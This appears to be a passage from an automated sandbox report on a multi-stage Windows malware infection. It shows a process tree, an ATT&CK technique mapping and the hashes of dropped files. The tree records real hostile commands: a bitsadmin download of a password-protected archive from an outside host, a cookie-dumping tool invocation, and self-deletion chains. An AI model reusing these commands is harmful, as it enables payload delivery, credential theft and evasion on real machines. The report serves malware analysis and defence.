                                                                                PID:960
                                                                                • C:\Users\Admin\AppData\Local\Temp\kvglpkqz.uab\SunLabsPlayer.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\kvglpkqz.uab\SunLabsPlayer.exe /S
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Drops file in Program Files directory
                                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                  PID:2792
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:2936
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                      • Drops file in Program Files directory
                                                                                      PID:2720
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:1004
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                        8⤵
                                                                                          PID:2264
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:768
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Drops file in Program Files directory
                                                                                          PID:2544
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                          • Checks for any installed AV software in registry
                                                                                          PID:2812
                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                          "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                          8⤵
                                                                                          • Download via BitsAdmin
                                                                                          PID:2024
                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pNFM5uOTEhcduVS4 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Drops file in Program Files directory
                                                                                          PID:2156
                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pTu7FDc7mojSd2jD -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2728
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                          8⤵
                                                                                            PID:3056
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                            8⤵
                                                                                              PID:2296
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                              8⤵
                                                                                                PID:1036
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:920
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                                8⤵
                                                                                                  PID:2284
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                  8⤵
                                                                                                    PID:1568
                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ASqacOXEm\ASqacOXEm.dll" ASqacOXEm
                                                                                                      9⤵
                                                                                                        PID:1360
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:2644
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                                      8⤵
                                                                                                        PID:1292
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:2368
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                                        8⤵
                                                                                                          PID:1052
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso100A.tmp\tempfile.ps1"
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2936
                                                                                                        • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                          "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                          8⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in System32 directory
                                                                                                          • Drops file in Program Files directory
                                                                                                          PID:1360
                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Modifies system certificate store
                                                                                              PID:836
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe" >> NUL
                                                                                                3⤵
                                                                                                  PID:2060
                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                    ping 127.0.0.1
                                                                                                    4⤵
                                                                                                    • Runs ping.exe
                                                                                                    PID:2104
                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                                2⤵
                                                                                                  PID:2208
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Adds Run key to start application
                                                                                                  PID:2484
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2196
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:2588
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:7944
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:7724
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "1656144118-3658313741567590894-1389255412711922610-1851622655-538320236-104194192"
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2208
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "988329791121114644614839474561114548980-3940284931170390847-1804552409-1543725792"
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                PID:836
                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe "229254278175462463-1841677339-167627690021141103961441902343-2090620457-1518281984"
                                                                                                1⤵
                                                                                                  PID:2676
                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe "590221742-743292170-7699865611546552102-36926957727923697212441024821411757509"
                                                                                                  1⤵
                                                                                                    PID:2212
                                                                                                  • C:\Windows\system32\conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe "-2134972802474857980-3283279422070012859-153442318618769738871235014453542541003"
                                                                                                    1⤵
                                                                                                      PID:2180
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B210.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\B210.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:2052
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BCBB.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\BCBB.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:2508
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\DE60.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\DE60.exe
                                                                                                      1⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:1492
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c timeout 1
                                                                                                        2⤵
                                                                                                          PID:2636
                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                            timeout 1
                                                                                                            3⤵
                                                                                                            • Delays execution with timeout.exe
                                                                                                            PID:2196
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\DE60.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\DE60.exe"
                                                                                                          2⤵
                                                                                                            PID:2800
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im DE60.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DE60.exe" & del C:\ProgramData\*.dll & exit
                                                                                                              3⤵
                                                                                                                PID:1484
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /im DE60.exe /f
                                                                                                                  4⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:1052
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 6
                                                                                                                  4⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:1676
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 928
                                                                                                              2⤵
                                                                                                              • Program crash
                                                                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                                                                              PID:1952
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\E6C9.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\E6C9.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:2592
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\E6C9.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\E6C9.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2444
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EC56.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\EC56.exe
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2640
                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                            1⤵
                                                                                                              PID:2972
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              C:\Windows\explorer.exe
                                                                                                              1⤵
                                                                                                                PID:896
                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                1⤵
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:2056
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                                                                                                1⤵
                                                                                                                  PID:1036
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:2904
                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:1844
                                                                                                                • C:\Windows\explorer.exe
                                                                                                                  C:\Windows\explorer.exe
                                                                                                                  1⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:1696
                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe "1177835546-605892502166668401915256979641255353986-1698556585-424239283-1780738119"
                                                                                                                  1⤵
                                                                                                                    PID:3056
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:2744
                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                    C:\Windows\explorer.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:2340
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    1⤵
                                                                                                                      PID:2032
                                                                                                                    • C:\Windows\system32\conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe "-1171086223-12151202211874241664-831027561764204147-1863973119-311920377-1603860154"
                                                                                                                      1⤵
                                                                                                                        PID:1568

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Execution

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Persistence

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1060

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Privilege Escalation

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Defense Evasion

                                                                                                                      Disabling Security Tools

                                                                                                                      2
                                                                                                                      T1089

                                                                                                                      Modify Registry

                                                                                                                      5
                                                                                                                      T1112

                                                                                                                      BITS Jobs

                                                                                                                      1
                                                                                                                      T1197

                                                                                                                      Install Root Certificate

                                                                                                                      1
                                                                                                                      T1130

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      5
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Software Discovery

                                                                                                                      1
                                                                                                                      T1518

                                                                                                                      Security Software Discovery

                                                                                                                      1
                                                                                                                      T1063

                                                                                                                      Query Registry

                                                                                                                      4
                                                                                                                      T1012

                                                                                                                      System Information Discovery

                                                                                                                      5
                                                                                                                      T1082

                                                                                                                      Peripheral Device Discovery

                                                                                                                      2
                                                                                                                      T1120

                                                                                                                      Remote System Discovery

                                                                                                                      1
                                                                                                                      T1018

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      5
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                        MD5

                                                                                                                        7124be0b78b9f4976a9f78aaeaed893a

                                                                                                                        SHA1

                                                                                                                        804f3e4b3f9131be5337b706d5a9ea6fcfa53e25

                                                                                                                        SHA256

                                                                                                                        bb28d7beea6e3faa641f69b9b4866858d87ca63f9eef15dae350b2dc28b537c3

                                                                                                                        SHA512

                                                                                                                        49f6df2ee5af4032ca47b01beb08648c7235a2dea51546aab8fc14d5f0ae7baa53cc539f24ea21d6db67882b4e65c8d271630fb8e12144cf24f6e8a4e598dff3

                                                                                                                      • C:\Program Files\MSBuild\MBGEUIKAAN\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\MSBuild\MBGEUIKAAN\ultramediaburner.exe
                                                                                                                        MD5

                                                                                                                        6103ca066cd5345ec41feaf1a0fdadaf

                                                                                                                        SHA1

                                                                                                                        938acc555933ee4887629048be4b11df76bb8de8

                                                                                                                        SHA256

                                                                                                                        b8d950bf6fa228454571f15cc4b7b6fbaa539f1284e43946abd90934db925201

                                                                                                                        SHA512

                                                                                                                        a9062e1fac2f6073a134d9756c84f70999240e36a98cb39684018e7d5bd3772f2ca21ab35bd2c6bd60413eb7306376e7f530e78ce4ebcfe256f766e8c42d16b3

                                                                                                                      • C:\Program Files\install.dat
                                                                                                                        MD5

                                                                                                                        806c3221a013fec9530762750556c332

                                                                                                                        SHA1

                                                                                                                        36475bcfd0a18555d7c0413d007bbe80f7d321b5

                                                                                                                        SHA256

                                                                                                                        9bcecc5fb84d21db673c81a7ed1d10b28686b8261f79136f748ab7bbad7752f7

                                                                                                                        SHA512

                                                                                                                        56bbaafe7b0883f4e5dcff00ae69339a3b81ac8ba90b304aeab3e4e7e7523b568fd9b269241fc38a39f74894084f1f252a91c22b79cc0a16f9e135859a13145e

                                                                                                                      • C:\Program Files\install.dll
                                                                                                                        MD5

                                                                                                                        fe60ddbeab6e50c4f490ddf56b52057c

                                                                                                                        SHA1

                                                                                                                        6a71fdf73761a1192fd9c6961f66754a63d6db17

                                                                                                                        SHA256

                                                                                                                        9fcfa73600ff1b588015ffa20779cec6714e48ee6ae15db8766f7ffd5ee3031d

                                                                                                                        SHA512

                                                                                                                        0113b47ba1a33a2f597a26c9b66435483373cde4edb183e0e92abef8ed003743f426ba5ffe25a5807c030cc14d8a95d73aa6af95a85f44a86dd40264ecb96536

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                                                        MD5

                                                                                                                        15775d95513782f99cdfb17e65dfceb1

                                                                                                                        SHA1

                                                                                                                        6c11f8bee799b093f9ff4841e31041b081b23388

                                                                                                                        SHA256

                                                                                                                        477a9559194edf48848fce59e05105168745a46bdc0871ea742a2588ca9fbe00

                                                                                                                        SHA512

                                                                                                                        ac09ce01122d7a837bd70277badd58ff71d8c5335f8fc599d5e3ed42c8fee2108dd043bce562c82ba12a81b9b08bd24b961c0961bf8fd3a0b8341c87483cd1e7

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                        MD5

                                                                                                                        afba243d46d04b4c6a265d2734d40a5f

                                                                                                                        SHA1

                                                                                                                        b8e0e03af82a4effa815cb39b77173393edddaef

                                                                                                                        SHA256

                                                                                                                        be595fae6339d392df8a6eef4df4652a6fb214ff3bffb98831b876e0c3fa473f

                                                                                                                        SHA512

                                                                                                                        9392658a44f431a6090803da430de696a0fdfd44d910ea36d1a9a5472397e216571da02fd5c1e0a3a3882cd10e9416a6cdd292ea5b20d39b3a31a7da05ffe204

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                        MD5

                                                                                                                        4ca4bf3b8057a1ce9cd9b44b8b960a55

                                                                                                                        SHA1

                                                                                                                        217670b5a4b83d2c4d34f915a33dc8b10118f2e7

                                                                                                                        SHA256

                                                                                                                        4c6d74d5acfb8f7737f5aaee5b9eca822a2f3ab44bd6ddaa81603c70a6c5ea82

                                                                                                                        SHA512

                                                                                                                        19a11ee6aa545fa657091a1b28107b90404d438fa217bd2b1ce0819def643f95b2d8de14808d7147842516bdbd5fd87c9ebe95a2023f143b6c49762db69755fc

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                        MD5

                                                                                                                        46f7001354f223c68010666370aeffd9

                                                                                                                        SHA1

                                                                                                                        4463a6ff3382a442841de58592ff1c5535922cd6

                                                                                                                        SHA256

                                                                                                                        cc1156ac2b6072610d1be046f3c0494b5381631bd39767bb1777c2381d2886c0

                                                                                                                        SHA512

                                                                                                                        e2109e070b5ed8debf22883969691a9046dbfb4a21660b24faa894993adcee7f8ffca91ffb074e3ae6a80177f2f9cc9af6dd32ba04c77b889fb7d889c3b1a6c6

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3b-15fc2-686-6c497-8284ba9ee4661\Xylaehaqeco.exe
                                                                                                                        MD5

                                                                                                                        c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                        SHA1

                                                                                                                        c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                        SHA256

                                                                                                                        f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                        SHA512

                                                                                                                        32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3b-15fc2-686-6c497-8284ba9ee4661\Xylaehaqeco.exe
                                                                                                                        MD5

                                                                                                                        c0cf9a2aa73be476329a8ffd03c17b19

                                                                                                                        SHA1

                                                                                                                        c73ebc58261e296e05ca53615741bd65181fcaaa

                                                                                                                        SHA256

                                                                                                                        f813266215b932646820f7a7e727a431b2e835d2bd8074f702554dd8c107ae82

                                                                                                                        SHA512

                                                                                                                        32a2adfedc5181add38567cb5562ad91d8d7f4da9fbee30fe189ef489f636d4624bcc23ce5b40513c6266658f667c5c3a750271dbe90d22c5c9c5a4151f8b68e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3b-15fc2-686-6c497-8284ba9ee4661\Xylaehaqeco.exe.config
                                                                                                                        MD5

                                                                                                                        98d2687aec923f98c37f7cda8de0eb19

                                                                                                                        SHA1

                                                                                                                        f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                                        SHA256

                                                                                                                        8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                                        SHA512

                                                                                                                        95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                        MD5

                                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                        SHA1

                                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                        SHA256

                                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                        SHA512

                                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                                                                                                                        MD5

                                                                                                                        41a5f4fd1ea7cac4aa94a87aebccfef0

                                                                                                                        SHA1

                                                                                                                        0d0abf079413a4c773754bf4fda338dc5b9a8ddc

                                                                                                                        SHA256

                                                                                                                        97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

                                                                                                                        SHA512

                                                                                                                        5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                        MD5

                                                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                        SHA1

                                                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                        SHA256

                                                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                        SHA512

                                                                                                                        f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                                                                                                                        MD5

                                                                                                                        3b1b318df4d314a35dce9e8fd89e5121

                                                                                                                        SHA1

                                                                                                                        55b0f8d56212a74bda0fc5f8cc0632ef52a4bc71

                                                                                                                        SHA256

                                                                                                                        4df9e7fcd10900ae5def897377f54856b0ddad1798fa22614eba56096940885b

                                                                                                                        SHA512

                                                                                                                        f04faca320d344378dd31bf05556fb3ac02873e46e2140d5858162e739f5c25bc9b32d619587c84c36b768b9193ea5292d63f62bb0b8458b35d65959b52df6b4

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\John_Ship.url
                                                                                                                        MD5

                                                                                                                        72825692a77bb94e1f69ef91bfbbff15

                                                                                                                        SHA1

                                                                                                                        db898f541f5e6e4305dfe469494d0ed1d4950395

                                                                                                                        SHA256

                                                                                                                        6e57ce08a3feecbb59a5b257660cc517793f1adb20b75d36a9d12f921fc826e7

                                                                                                                        SHA512

                                                                                                                        9a2c3ba9be966bb6f3ebf188578fa335a2583ce9c3ae94cbe3a044b02a339a9ca22b4a31e8c6076c720c8632fca6d1ebbc7a4575d0fe463cb4c526c187e333b8

